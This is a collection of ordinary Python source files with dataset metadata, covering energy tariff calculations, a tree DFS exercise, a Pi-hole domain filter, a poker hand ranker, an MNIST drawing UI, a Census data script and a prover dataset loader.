{\n \"energia_cativo_p_reais\": energia_cativo_p_reais,\n \"energia_cativo_fp_reais\": energia_cativo_fp_reais\n }\n\n def _calculate_energia_reat_exc_reais(\n self, company_month_data, company_params, tarifas_repository\n ):\n tarifas_month_data_p = self._get_fares_month_data(\n tarifas_repository, company_params, posto=\"Ponta\"\n )\n\n tarifas_month_data_fp = self._get_fares_month_data(\n tarifas_repository, company_params, posto=\"Fora Ponta\"\n )\n\n tu_p = tarifas_month_data_p[\"tu\"]\n tu_fp = tarifas_month_data_fp[\"tu\"]\n\n ener_reat_exc_p = company_month_data[\"ener_reat_exced_ponta\"]\n ener_reat_exc_fp = company_month_data[\"ener_reat_exced_fora_ponta\"]\n\n ener_reat_exc_p_reais = ener_reat_exc_p*tu_p\n ener_reat_exc_fp_reais = ener_reat_exc_fp*tu_fp\n\n return {\n \"ener_reat_exc_p_reais\": ener_reat_exc_p_reais,\n \"ener_reat_exc_fp_reais\": ener_reat_exc_fp_reais\n }\n\n def _get_company_month_data(self, empresas_repository):\n return empresas_repository.get_data_using_company_and_reference_date(\n reference_date=self.reference_date, company_name=self.company_name\n )\n \n @staticmethod\n def _get_company_params(company_month_data):\n return {\n \"reference_date\": company_month_data[\"data_referencia\"],\n \"fornecedora\": company_month_data[\"fornecedora\"],\n \"modalidade\": company_month_data[\"modalidade\"],\n \"subgrupo\": company_month_data[\"subgrupo\"],\n } if company_month_data else \"NÃO HÁ DADOS DESSA EMPRESA, FAÇA UM NOVO REQUEST!\"\n\n @staticmethod\n def _get_fares_month_data(tarifas_repository, company_params, posto):\n company_params.update({\"posto\": posto})\n\n print(\" \")\n print(\"Tarifas repository::\")\n print(tarifas_repository.get_fares(\n input_params=company_params\n )\n)\n\n return tarifas_repository.get_fares(\n input_params=company_params\n )\n\n\nif __name__ == '__main__':\n Controller(\n company_name=\"Teste\",\n reference_date=\"01-01-2020\"\n 
).execute()","repo_name":"arthurtuio/gide-flask-api","sub_path":"motor_calculo/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":9976,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30086772529","text":"import sys\r\ninput = sys.stdin.readline\r\nsys.setrecursionlimit(1000000)\r\n\r\ndef dfs(idx):\r\n for i in visited[idx]:\r\n if not parents[i]:\r\n parents[i] = idx\r\n dfs(i)\r\n\r\n\r\n# 노드의 개수\r\ncnt_node = int(input())\r\n# 자식인덱스에 부모 노드 저장할 리스트\r\nparents = [0] * (cnt_node + 1)\r\n# 간선의 수 = 노드의 개수 - 1 만큼 저장\r\nvisited = [[] for _ in range(cnt_node + 1)]\r\nfor _ in range(cnt_node - 1):\r\n i, j = map(int, input().split())\r\n visited[i].append(j)\r\n visited[j].append(i)\r\n\r\ndfs(1)\r\n\r\nfor idx in range(2, cnt_node + 1):\r\n print(parents[idx])","repo_name":"chahyeoncheol/BAEKJOON","sub_path":"백준/Silver/11725. 트리의 부모 찾기/트리의 부모 찾기.py","file_name":"트리의 부모 찾기.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41687295305","text":"# encoding utf-8\n# created: 03 May 2022 - Duaine Alderman\n\n\nimport pathlib\nimport sqlite3\n\n# Store the query here for ease of use\nSQL_QUERY = \"\"\"SELECT domain FROM queries WHERE CLIENT IN ({}) GROUP BY DOMAIN;\"\"\"\n\n# The hardcoded text that starts the exclusion lines in the conf file\nAPI_DOMAIN_LINE = \"API_EXCLUDE_DOMAINS=\"\nAPI_CLIENT_LINE = \"API_EXCLUDE_CLIENTS=\"\n\n\nclass PiHoleDomainFilter():\n def __init__(self):\n # SQL\n self.sql_connection = None\n self.sql_cursor = None\n\n # Filter storage\n self.filter_domains = set()\n self.filter_clients = set()\n\n # Files\n self.setup_file = pathlib.Path('/etc/pihole/setupVars.conf')\n self.backup_file = pathlib.Path('/etc/pihole/setupVars.conf.bak')\n\n # Execute the script now\n try:\n self.backup_settings()\n self.fetch_sql()\n self.rebuild_settings()\n except:\n print(\"Exception raised, closing connection...\")\n # Close the connection if possible in case we hit ANY error\n if self.sql_connection:\n self.sql_connection.close()\n\n def backup_settings(self):\n \"\"\"\n Backup the settings file to ensure that if anything happens we will have a restore point.\n\n :return: None\n \"\"\"\n\n print('Backing up settings file...')\n with open(self.setup_file, 'r') as orig_file:\n with open(self.backup_file, 'w') as out_file:\n for file_line in orig_file:\n # Get the already filtered domains\n if API_DOMAIN_LINE in file_line:\n self.filter_domains = {item.replace('\\n', '') for item in file_line.split(API_DOMAIN_LINE)[1].split(',')}\n # Get the clients that control what we add to the filter\n elif API_CLIENT_LINE in file_line:\n self.filter_clients = {f\"'{item.strip()}'\" for item in file_line.split(API_CLIENT_LINE)[1].split(',')}\n out_file.write(file_line)\n\n def fetch_sql(self):\n \"\"\"\n Fetch the needed domains from the Sqlite3 database (assuming standard install locations for\n Pi-Hole at this time) using the provided exclusion client IPs.\n\n :return: None\n \"\"\"\n\n print('Fetching information from SQL...')\n self.sql_connection = sqlite3.connect(\"/etc/pihole/pihole-FTL.db\")\n self.sql_cursor = self.sql_connection.cursor()\n self.sql_cursor.execute(SQL_QUERY.format(\",\".join(self.filter_clients)))\n sql_results = self.sql_cursor.fetchall()\n for item in sql_results:\n self.filter_domains.add(str(item[0]))\n self.sql_connection.close()\n\n def rebuild_settings(self):\n \"\"\"\n 
Rebuilds the settings file based upon the backup file, the stored filter information, and\n the new information parsed from the Sqlite3 DB file.\n\n The backup file is only opened for reading and will not be modified in any way. Only the\n original file will be changed.\n\n :return: None\n \"\"\"\n\n print('Rebuilding settings file from SQL...')\n with open(self.backup_file, 'r') as backup_file:\n with open(self.setup_file, 'w') as out_file:\n for file_line in backup_file:\n # Get the already filtered domains\n if API_DOMAIN_LINE in file_line:\n file_line = f\"{API_DOMAIN_LINE}{','.join(self.filter_domains)}\"\n file_line += '\\n'\n out_file.write(file_line)\n\n\nif __name__ == '__main__':\n PiHoleDomainFilter()\n","repo_name":"aldermde027/Pihole-Domain-Filter","sub_path":"pihole_domain_filter.py","file_name":"pihole_domain_filter.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72303557054","text":"import sublime\n\n\nclass ProgressBar:\n \"\"\"\n Show a message in the status bar\n \"\"\"\n\n def __init__(self, label, width=10):\n self.label = label\n self.width = width\n\n def start(self):\n self.done = False\n self.update()\n\n def stop(self):\n sublime.status_message(\"\")\n self.done = True\n\n def update(self, status=0):\n if self.done:\n return\n status = status % (2 * self.width)\n before = min(status, (2 * self.width) - status)\n after = self.width - before\n sublime.status_message(\"%s [%s=%s]\" % (\n self.label, \" \" * before, \" \" * after))\n sublime.set_timeout(lambda: self.update(status + 1), 100)\n","repo_name":"gepd/Deviot","sub_path":"libraries/progress_bar.py","file_name":"progress_bar.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":301,"dataset":"github-code","pt":"79"} +{"seq_id":"20488922543","text":"import tkinter as tk\n\nimport torch\nfrom PIL import Image, ImageDraw\nfrom torch import nn\nfrom torchvision import transforms\n\n\n# import numpy as np\n\n\nclass Window:\n def __init__(self):\n window = tk.Tk()\n window.title('MNIST')\n window.geometry('500x300') # window size\n window['bg'] = 'gray' # background color\n window.attributes(\"-alpha\", 0.95) # diaphaneity\n\n self.model_init()\n\n label = tk.Label(window, text='请在画板上画出数字,并点击“识别”按钮识别数字', font=('Arial', 10))\n label.pack()\n\n # hand-drawing canvas\n self.canvas = tk.Canvas(window, bg='black', width=200, height=200)\n self.canvas.pack()\n self.canvas.bind('', self.onLeftButtonDown)\n self.canvas.bind('', self.onLeftButtonMove)\n self.canvas.bind('', self.onLeftButtonUp)\n\n # button recognize\n btn_p = tk.Button(window, text=\"识别\", font=('Arial', 10), width=10, height=2,\n command=lambda: self.predict(self.canvas, window))\n btn_p.pack()\n btn_p.place(x=100, y=230)\n\n # button clear\n btn_c = tk.Button(window, text=\"清空\", font=(\n 'Arial', 10), width=10, height=2, command=self.clear)\n btn_c.pack()\n btn_c.place(x=310, y=230)\n\n # PIL image draw\n self.image = Image.new(\"RGB\", (200, 200), (0, 0, 0))\n self.draw = ImageDraw.Draw(self.image)\n\n # bottom status bar\n self.statusbar = tk.Label(\n window, text=\"\", bd=1, relief=tk.SUNKEN, anchor=tk.W)\n self.statusbar.pack(side=tk.BOTTOM, fill=tk.X)\n\n window.mainloop()\n\n def model_init(self):\n # self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.device = torch.device('cuda')\n # net = Net().to(device)\n self.model = 
torch.load('model/mnist_cnn.pth')\n self.model.to(self.device)\n self.model.eval()\n print('model loading complete.')\n\n def onLeftButtonDown(self, event):\n self.lastx, self.lasty = event.x, event.y\n self.statusbar.config(text='btn down')\n print('btn down...')\n\n def onLeftButtonMove(self, event):\n self.canvas.create_line(self.lastx, self.lasty,\n event.x, event.y, fill='white', width=8)\n self.draw.line([self.lastx, self.lasty, event.x,\n event.y], (255, 255, 255), width=10)\n self.lastx, self.lasty = event.x, event.y\n self.statusbar.config(text='x:{}, y:{}'.format(event.x, event.y))\n print(event.x, event.y)\n\n def onLeftButtonUp(self, event):\n self.lastx, self.lasty = 0, 0\n print('btn up')\n\n def predict(self, canvas, window):\n # self.image.save('canvas.jpg')\n image = self.image.resize((28, 28))\n image = image.convert('L')\n # image = np.expand_dims(image, 0)\n # image = np.array(image)\n # image = torch.Tensor(image)\n\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n image = transform(image)\n # image = Variable(torch.unsqueeze(\n # image, dim=0).float(), requires_grad=False)\n image.unsqueeze_(0)\n image = image.to(self.device)\n output = self.model(image)\n # find index of max prob\n pred = output.max(1, keepdim=True)[1]\n num = pred.cpu().numpy()[0][0]\n self.statusbar.config(text='predict num:' + str(num))\n print('predict:' + str(num))\n\n def clear(self):\n # clear canvas\n self.canvas.delete(tk.ALL)\n self.image = Image.new(\"RGB\", (200, 200), (0, 0, 0))\n self.draw = ImageDraw.Draw(self.image)\n\n\nclass Net(nn.Module):\n \"\"\"\n customized neural network\n \"\"\"\n\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 6, kernel_size=5, padding=2)\n self.conv2 = nn.Conv2d(6, 16, kernel_size=5)\n self.conv3 = nn.Conv2d(16, 120, kernel_size=5)\n self.maxpool = nn.MaxPool2d(2)\n self.relu = nn.ReLU()\n self.fc1 = nn.Linear(120, 84)\n self.fc2 = nn.Linear(84, 10)\n self.softmax = nn.LogSoftmax(dim=1) # log to solve value overflow\n\n def forward(self, x):\n # block1\n out = self.conv1(x)\n out = self.maxpool(out)\n out = self.relu(out)\n\n # block2\n out = self.conv2(out)\n out = self.maxpool(out)\n out = self.relu(out)\n\n # block3\n out = self.conv3(out)\n out = self.relu(out)\n\n # block4\n out = out.view(x.size(0), -1)\n out = self.fc1(out)\n out = self.relu(out)\n out = self.fc2(out)\n out = self.softmax(out)\n\n return out\n\n\nif __name__ == \"__main__\":\n window = Window()\n","repo_name":"ivanwhaf/DL","sub_path":"mnist_ui.py","file_name":"mnist_ui.py","file_ext":"py","file_size_in_byte":4896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"929644544","text":"#input: adn(str)\n#output: ci(str) es la cadena complementaria expresada de manera inversa\n#ci = complemento inverso\nadn = input(\"ADN: \")\nadn = adn.upper()\nci= \"\"\nfor i in range(len(adn)-1,-1,-1):\n if adn[i]==\"A\":\n ci = ci + \"T\"\n if adn[i]==\"T\":\n ci = ci+\"A\"\n if adn[i]==\"G\":\n ci =ci +\"C\"\n if adn[i]==\"C\":\n ci = ci +\"G\"\nprint(\"Cadena inicial: \",adn)\nprint(\"Cadena replicada: \",ci)\n","repo_name":"ZaphPie/PC-casa","sub_path":"python/CICLO 2022-0/CICLO VERANO/Strings/Funciones básicas/ejemplo8_lab_s10.py","file_name":"ejemplo8_lab_s10.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16334099022","text":"# A famous 
casino is suddenly faced with a sharp decline of their revenues.\n# They decide to offer Texas hold'em also online. \n# Can you help them by writing an algorithm that can rank poker hands?\n\nclass PokerHand(object):\n\n #RESULT = [\"Loss\", \"Tie\", \"Win\"]\n\n def __init__(self, hand):\n # Hand preprocessing\n self.hand = hand.split(\" \")\n for pos, card in enumerate(self.hand):\n if card[0] == \"T\":\n self.hand[pos] = card.replace(\"T\", \"10\")\n elif card[0] == \"J\":\n self.hand[pos] = card.replace(\"J\", \"11\")\n elif card[0] == \"Q\":\n self.hand[pos] = card.replace(\"Q\", \"12\")\n elif card[0] == \"K\":\n self.hand[pos] = card.replace(\"K\", \"13\")\n elif card[0] == \"A\":\n self.hand[pos] = card.replace(\"A\", \"14\")\n \n # Creating dictionary.\n self.dictionary = {}\n self.suit_list = []\n self.number_list = []\n for idx in range(5):\n self.suit_list.append(self.hand[idx][-1])\n self.number_list.append(int(self.hand[idx][:-1]))\n self.dictionary['suit'] = self.suit_list\n self.dictionary['numbers'] = self.number_list\n # Count repetitions of numbers in the hand.\n self.rnum = [self.dictionary['numbers'].count(i) for i in self.dictionary['numbers']]\n # Count repetitions of suits in the hand.\n self.rsuits = [self.dictionary['suit'].count(i) for i in self.dictionary['suit']]\n # The difference between the greater and the smallest number in the hand.\n self.dif = max(self.dictionary['numbers']) - min(self.dictionary['numbers']) \n \n # Auxilary function that helps to find the highest solo card.\n def highest_card(self):\n solo_cards = []\n self.solo_card_score = 0\n for card in range(2, 15):\n if self.dictionary['numbers'].count(card) == 1:\n solo_cards.append(card)\n for idx in range(1, len(solo_cards) + 1):\n self.solo_card_score += round((((15 - sorted(solo_cards)[-idx]) / idx ** 3) / 100), 5)\n return self.solo_card_score \n \n def combination_search(self):\n # Search for combination and score it.\n self.combination = \"\"\n self.score = 0\n # Additional variables which helps to score some combinations.\n self.temp_score1 = 0\n self.temp_score2 = 0\n \n # Start checking from the best combinations.\n # Check for a royal and street flush, and flush itself.\n if 5 in self.rsuits:\n if sorted(self.dictionary['numbers']) == [10, 11, 12, 13, 14]:\n self.combination = \"Royal Flush\"\n self.score = 1\n return self.combination, self.score\n elif self.dif == 4 and max(self.rnum) == 1:\n self.combination = \"Straight Flush\"\n self.score = 15 - max(self.dictionary['numbers']) # max score - 9\n return self.combination, self.score\n else:\n self.combination = \"Flush\"\n self.temp_score1 = (15 - sorted(self.dictionary['numbers'])[-1]) + \\\n (15 - sorted(self.dictionary['numbers'])[-2]) / 100 + \\\n (15 - sorted(self.dictionary['numbers'])[-3]) / 1_000 + \\\n (15 - sorted(self.dictionary['numbers'])[-4]) / 10_000 + \\\n (15 - sorted(self.dictionary['numbers'])[-5]) / 100_000\n self.score = 35 + self.temp_score1 # max score - 44.*****\n return self.combination, self.score\n\n # Check four of a kind.\n if 4 in self.rnum:\n self.combination = \"Four of a Kind\"\n for card in self.dictionary['numbers']:\n if self.dictionary['numbers'].count(card) == 4:\n self.score = 24 - card + self.highest_card() # max score - 22\n break\n return self.combination, self.score\n\n # Check full house.\n if sorted(self.rnum) == [2, 2, 3, 3, 3]:\n self.combination = \"Full House\"\n for card in self.dictionary['numbers']:\n if self.dictionary['numbers'].count(card) == 3:\n self.temp_score1 = 15 - card\n 
elif self.dictionary['numbers'].count(card) == 2:\n self.temp_score2 = (15 - card) / 100\n self.score = 22 + self.temp_score1 + self.temp_score2 # max score - 35.**\n return self.combination, self.score\n\n # Check straight.\n if self.dif == 4 and max(self.rnum) == 1:\n self.combination = \"Straight\"\n self.score = 59 - max(self.dictionary['numbers']) # max score - 53\n return self.combination, self.score\n\n # Check three of a kind.\n if 3 in self.rnum:\n self.combination = \"Three of a Kind\"\n for card in self.dictionary['numbers']:\n if self.dictionary['numbers'].count(card) == 3:\n self.temp_score1 = 15 - card\n break \n self.score = 53 + self.temp_score1 + self.highest_card() # max score - 66\n return self.combination, self.score \n\n # Check pair and two pairs.\n pairs = []\n for card in range(2, 15):\n if self.dictionary['numbers'].count(card) == 2:\n pairs.append(card)\n if len(pairs) == 1:\n self.combination = \"Pair\"\n self.temp_score1 = 15 - pairs[0]\n self.score = 78 + self.temp_score1 + self.highest_card() # max score - 91\n return self.combination, self.score\n elif len(pairs) == 2:\n self.combination = \"Two Pairs\"\n self.temp_score1 = 15 - max(pairs)\n self.temp_score2 = (15 - min(pairs)) / 100\n self.score = 66 + self.temp_score1 + self.temp_score2 + self.highest_card() # max score - 78.**\n return self.combination, self.score\n \n # If no combination - return the highest card.\n self.combination = \"The Highest Card\"\n self.score = 91 + self.highest_card()\n return self.combination, self.score\n\n def compare_with(self, other):\n if self.combination_search()[-1] > other.combination_search()[-1]:\n return \"Loss\"\n elif self.combination_search()[-1] < other.combination_search()[-1]:\n return \"Win\"\n else:\n return \"Tie\"\n\nstring = \"2H 2C 2S 3H 3D\"\nstring1 = \"3D 2H 3H 2C 2D\"\n\nme = PokerHand(string)\nopponent = PokerHand(string1)\nprint(me.combination_search())\nprint(opponent.combination_search())\nprint(me.compare_with(opponent))\n\ntest = {'card1': [13, 'S'], 'card2': [2, 'S'], 'card3': [5, 'S'], 'card4': [11, 'S'], 'card5': [10, 'S']}\nlist1 = [2, 3, 4, 4, 5]\n#print(list1.count(4))\nprint(me.highest_card())\nprint(opponent.highest_card())\n\n","repo_name":"Golovolastik/my_algorithms","sub_path":"codewars/ranking_poker_hands.py","file_name":"ranking_poker_hands.py","file_ext":"py","file_size_in_byte":6988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1737726090","text":"## This script will grab population and language data from Census Bureau ACS API and output to Geodatabase of user's choice. 
Designed as a ArcGIS script tool.\r\n## Developed by Kayne Neigherbauer for Wisconsin Emergency Management Sept 2017\r\n\r\n#import modules\r\ntry:\r\n import sys, urllib2, json, string, csv, arcpy, os, socket\r\n from datetime import date\r\nexcept ImportError:\r\n sys.exit(\"Error importing 1 or more required modules.\")\r\n\r\ndef main():\r\n\r\n def fetchData(url):\r\n arcpy.AddMessage(\"Fetching Data...\")\r\n try:\r\n response = urllib2.urlopen(url)\r\n except urllib2.HTTPError as e:\r\n arcpy.AddMessage(\"HTTP Error: \" + str(e.code))\r\n return None\r\n except urllib2.URLError as e:\r\n arcpy.AddMessage(\"URL Error: \" + str(e.reason))\r\n return None\r\n else:\r\n code = response.getcode()\r\n if code == 200:\r\n # if success (200) then read the data\r\n data = json.load(response)\r\n if data == []:\r\n data = None\r\n #print json.dumps(data, indent =2)\r\n return data\r\n else:\r\n arcpy.AddMessage(\"Unsuccessful URL Data Request.\")\r\n return None\r\n \r\n def joinData(data,geom,dbpath,clip):\r\n \r\n #create temp data scratch GDB\r\n tempData = arcpy.CreateScratchName(workspace=arcpy.env.scratchGDB)\r\n arcpy.env.scratchWorkspace = tempData\r\n arcpy.env.overwriteOutput = True\r\n tempPath = arcpy.GetSystemEnvironment(\"TEMP\") \r\n ## some variables ##\r\n clipped = \"clipped\"\r\n tracts = \"tracts\"\r\n tracts_clip = \"tracts_clip\"\r\n final_tracts = \"final\"\r\n csv_file = os.path.join(tempPath,'census.csv')\r\n clipJSON = os.path.join(tempPath,'clip.json')\r\n \r\n #open and write data to file as csv with a header row\r\n with open(csv_file, 'wb') as f:\r\n writer = csv.writer(f)\r\n writer.writerow(data.pop(0)) #header row\r\n for item in data:\r\n #strip the excess long digits for GEOID\r\n item[1] = item[1].lstrip('14000US')\r\n writer.writerows(data)\r\n with open(clipJSON, 'wb') as f:\r\n json.dump(clip, f)\r\n\r\n arcpy.AddMessage(\"Processing Data...\")\r\n fields = fieldsList\r\n if fields == ['B16001_001E','B16001_005E','B16001_020E','B16001_026E','B16001_068E','B16001_080E']:\r\n aliases = [\"Total - 5+ yrs of age\", \"Spanish or Spanish Creole: Speak English less than 'very well'\", \"German: Speak English less than 'very well'\", \"Other West Germanic languages: Speak English less than 'very well'\" , \"Chinese: Speak English less than 'very well'\" , \"Hmong: Speak English less than 'very well'\"]\r\n else:\r\n aliases = []\r\n # Geometry json to feature class\r\n #arcpy.JSONToFeatures_conversion(geomJSON, tracts)\r\n if arcpy.Exists(clipped):\r\n arcpy.Delete_management(clipped)\r\n arcpy.JSONToFeatures_conversion(os.path.join(tempPath,'clip.json'), clipped)\r\n # Convert csv to table\r\n if arcpy.Exists(\"csv_table\"):\r\n arcpy.Delete_management(\"csv_table\")\r\n arcpy.CopyRows_management(csv_file, \"csv_table\")\r\n # Add Field for string verison of GEOID\r\n arcpy.AddField_management(\"csv_table\", \"GID_TEXT\", \"TEXT\")\r\n # Calculate the new Field (GEOID)\r\n arcpy.CalculateField_management(\"csv_table\", \"GID_TEXT\", \"[GEO_ID]\")\r\n # Process: Add Join - join the table to the layer\r\n arcpy.JoinField_management(geom, \"GEOID\", \"csv_table\", \"GID_TEXT\")\r\n # Copy features to new file - saves join.\r\n if arcpy.Exists(\"new_tracts\"):\r\n arcpy.Delete_management(\"new_tracts\")\r\n arcpy.CopyFeatures_management(geom, \"new_tracts\")\r\n #get rid of text version of GEOID field\r\n arcpy.DeleteField_management(\"new_tracts\", [\"GID_TEXT\"])\r\n #Change field names and aliases.\r\n fList = arcpy.ListFields(\"new_tracts\")\r\n for f in fList: 
\r\n for i in range(0,len(fields)):\r\n if f.name == fields[i]:\r\n arcpy.AlterField_management(\"new_tracts\",f.name, fields[i], aliases[i])\r\n # Clip the census tracts to wi boundary\r\n if arcpy.Exists(tracts_clip):\r\n arcpy.Delete_management(tracts_clip)\r\n arcpy.Clip_analysis(\"new_tracts\", clipped, tracts_clip)\r\n # Copy to save field names\r\n if arcpy.Exists(final_tracts):\r\n arcpy.Delete_management(final_tracts)\r\n arcpy.AddMessage(\"Writing File...\")\r\n arcpy.CopyFeatures_management(tracts_clip, final_tracts)\r\n \r\n # Cleanup temp files\r\n arcpy.Delete_management(\"new_tracts\")\r\n arcpy.Delete_management(tracts_clip)\r\n arcpy.Delete_management(\"csv_table\")\r\n arcpy.Delete_management(csv_file)\r\n arcpy.Delete_management(tracts)\r\n arcpy.Delete_management(clipped)\r\n arcpy.Delete_management(clipJSON)\r\n \r\n ##clean up fields in case of bad data write - start a list of field names\r\n fcFieldList = set(arcpy.ListFields(dbpath))\r\n dataFieldList = set(arcpy.ListFields(final_tracts))\r\n newFieldList = []\r\n newFieldList.append(fcFieldList & dataFieldList)\r\n #set up cursors to update dataset feature class\r\n sfc = final_tracts #search cursor feature class\r\n ufc = dbpath\r\n with arcpy.da.SearchCursor(sfc, newFieldList) as sCur:\r\n with arcpy.da.UpdateCursor(ufc, newFieldList) as uCur:\r\n for sRow in sCur:\r\n for uRow in uCur:\r\n if sRow[1] == uRow[1]:\r\n uRow = [sRow]\r\n uCur.updateRow(uRow)\r\n break\r\n\r\n # Cleanup last temp file\r\n arcpy.Delete_management(final_tracts)\r\n arcpy.AddMessage(\"Census data updated.\")\r\n \r\n \r\n #set timeout for web requests\r\n timeout = 10\r\n socket.setdefaulttimeout(timeout)\r\n \r\n # path of workspace dataset\r\n global dbpath\r\n dbpath = arcpy.GetParameterAsText(0)\r\n geom = arcpy.GetParameterAsText(1)\r\n \r\n # current year\r\n global year\r\n year = date.today().year\r\n global acsYear\r\n acsYear = arcpy.GetParameterAsText(4)\r\n \r\n ## census api key\r\n key = arcpy.GetParameterAsText(2)\r\n ##census fields from user input\r\n fields = arcpy.GetParameterAsText(3) ##B16001_001E,B16001_005E,B16001_020E,B16001_026E,B16001_068E,B16001_080E\r\n global fieldsList\r\n fieldsList = fields.split(';')\r\n fieldsStr = string.join(fieldsList,',')\r\n arcpy.AddMessage(fieldsStr)\r\n arcpy.AddMessage(fieldsList)\r\n\r\n \r\n ### call functions ###\r\n # get data from ACS REST ENDs\r\n url = \"https://api.census.gov/data/{0}/acs/acs5?get=NAME,GEO_ID,COUNTY,{1}&for=tract:*&in=state:55&key={2}\".format(str(acsYear),fieldsStr,key)\r\n arcpy.AddMessage(url)\r\n #go get it\r\n data = fetchData(url)\r\n## while acsYear >= 2015:\r\n## # url for 2015 ACS 5yr estimate for:\r\n## # Language spoken at home by ability to speak english less than well, specific languages\r\n## url = \"https://api.census.gov/data/\" + str(acsYear) + \"/acs/acs5?get=NAME,GEO_ID,\" + fields + \"&for=tract:*&in=state:55&key=\" + key\r\n## arcpy.AddMessage(url)\r\n## #go get it\r\n## data = fetchData(url)\r\n## #try year before this one if no data\r\n## if data == None:\r\n## acsYear -= 1\r\n## else:\r\n## break\r\n\r\n # State boundary url from DMA public end point\r\n clipUrl = \"https://widmamaps.us/dma/rest/services/WEM/WI_State_Boundary/MapServer/0/query?where=STATE_FIPS+%3D+55&geometryType=esriGeometryEnvelope&spatialRel=esriSpatialRelIntersects&returnGeometry=true&f=json\"\r\n #go get it\r\n clip = fetchData(clipUrl)\r\n \r\n # join csv data with census tract layer geometry\r\n joinData(data,geom,dbpath,clip)\r\n \r\n\r\n\r\nif __name__ 
== \"__main__\":\r\n main()\r\n","repo_name":"kaynen6/WEM_CensusACS5_Data","sub_path":"census.py","file_name":"census.py","file_ext":"py","file_size_in_byte":8136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"8369738170","text":"'''\nCreated on May 15, 2014\n\n@author: Frank Dorssers\n'''\n\n# pylint: disable=C0103, E0611, W0141\nfrom os import listdir\nfrom os.path import isfile, join\nimport numpy as np\nfrom src.GlobalVars import PATH\nfrom scipy.sparse import coo_matrix as smat\n\n\nclass DataSet(object):\n '''\n Class for loading, parsing and using Satallax and E data.\n\n This information contains problems (N), features (M) and\n strategy times (K).\n\n Variables\n ---------\n problems : 1 x N Numpy array\n Contains all problem names\n strategies : 1 x K Numpy array\n Contains all strategy names\n feature matrix : N x M Numpy array\n Contains all features for each problem\n strategy matrix : N x K numpy array\n Contains all times for each strategy and problem\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n self.feature_matrix = None\n self.strategy_matrix = None\n self.strategy_files = None\n self.strategies = None\n self.problems = None\n\n self.whitelist = ['protokoll_G', 'protokoll_H', 'protokoll_U']\n\n def mask(self, mask):\n '''\n Creates a masked copy of the current data\n '''\n copy = DataSet()\n copy.feature_matrix = self.feature_matrix[mask]\n copy.strategy_matrix = self.strategy_matrix[mask]\n copy.strategies = self.strategies\n copy.strategy_files = self.strategy_files\n copy.problems = self.problems[mask]\n return copy\n\n def sparsify(self):\n '''\n Creates a sparse version of the current strategy matrix\n '''\n self.strategy_matrix = (self.strategy_matrix > -1) * self.strategy_matrix\n self.strategy_matrix = smat(self.strategy_matrix)\n\n def load(self, data_type):\n '''\n Loads a certain data type, 'E' or 'Satallax'\n\n Parameters\n ----------\n data_type : string\n The name of the data type\n '''\n if data_type == 'E':\n self.parse_E_data()\n elif data_type == 'Satallax':\n self.parse_Satallax_data()\n else:\n raise IOError('Cannot parse unknown data type %s.'\n % data_type)\n\n def parse_Satallax_data(self): # NOQA\n '''\n Loads and parses Satallax data, this includes strategy names,\n strategy times, problem names and problem features.\n These are stored in variables in the class\n '''\n self.problems, self.feature_matrix = self.sat_load_features()\n satallax_files = [f for f in self.sat_get_strat_file_names() if f.endswith('.results')]\n satallax_strats = [self.sat_load_strat(sat) for sat in satallax_files]\n tmp_strategies = ['-m ' + sfile.replace('.results', '') for sfile in satallax_files]\n self.strategies = np.array(tmp_strategies)\n self.strategy_matrix = self.sat_generate_strat_matrix(self.problems, satallax_strats)\n\n def parse_E_data(self): # NOQA\n '''\n Loads and parses E data, this includes strategy names,\n strategy times, problem names and problem features.\n These are stored in variables in the class\n '''\n self.strategies = []\n self.strategy_files = []\n sdict = self.load_strategies()\n fdict = self.load_features(sdict)\n self.feature_matrix = self.generate_feature_matrix(fdict)\n self.strategy_matrix = self.generate_strategy_matrix(fdict)\n self.problems = np.array(fdict.keys())\n self.strategies = np.array(self.strategies)\n\n def is_relevant_strategy(self, strategy):\n '''\n Checks whether a certain strategy is a valid E strategy depending on the whitelist\n\n 
Parameters\n ----------\n strategy : string\n The name of the strategy that should be checked\n\n Returns\n -------\n result : boolean\n True if it is a relevant strategy\n '''\n return any(map(strategy.startswith, self.whitelist))\n\n def get_strategy_file_names(self, path=join(PATH, 'data/E/TESTRUNS_PEGASUS/')):\n '''\n Collects and returns all relevant filenames for 'E' strategies in a certain path\n\n Parameters\n ----------\n path : string\n Path to a folder which should be checked for strategy file names\n\n Returns\n -------\n result : list\n A list of strings containing all relevant strategy file names\n '''\n return [f for f in listdir(path) if\n isfile(join(path, f)) and self.is_relevant_strategy(f)]\n\n def load_strategies(self, path=join(PATH, 'data/E/TESTRUNS_PEGASUS/')):\n '''\n Loads all strategy file names, parses them and puts them in a list of\n dictionaries in the shape of {key : [[],[]]}, the initial list in the\n value will contain the strategy times\n\n Parameters\n ----------\n path : string\n Path to a folder which contains the strategy files\n\n Returns\n -------\n sdict : list\n List containing a dictionary for each strategy file in the shape\n of {key : [[],[]]}, the initial list containing the strategy times\n '''\n sfiles = self.get_strategy_file_names()\n sdict = dict()\n for sfile_i in range(len(sfiles)):\n sfile = sfiles[sfile_i]\n firstline = True\n with open(path + sfile, 'r') as inputstream:\n for line in inputstream:\n if firstline:\n firstline = False\n self.strategies.append(line[2:].strip())\n self.strategy_files.append(sfile)\n else:\n sline = line.split()\n if not sline[0] in sdict:\n sdict[sline[0]] = [-1 * np.ones(len(sfiles)), []]\n if sline[1] == 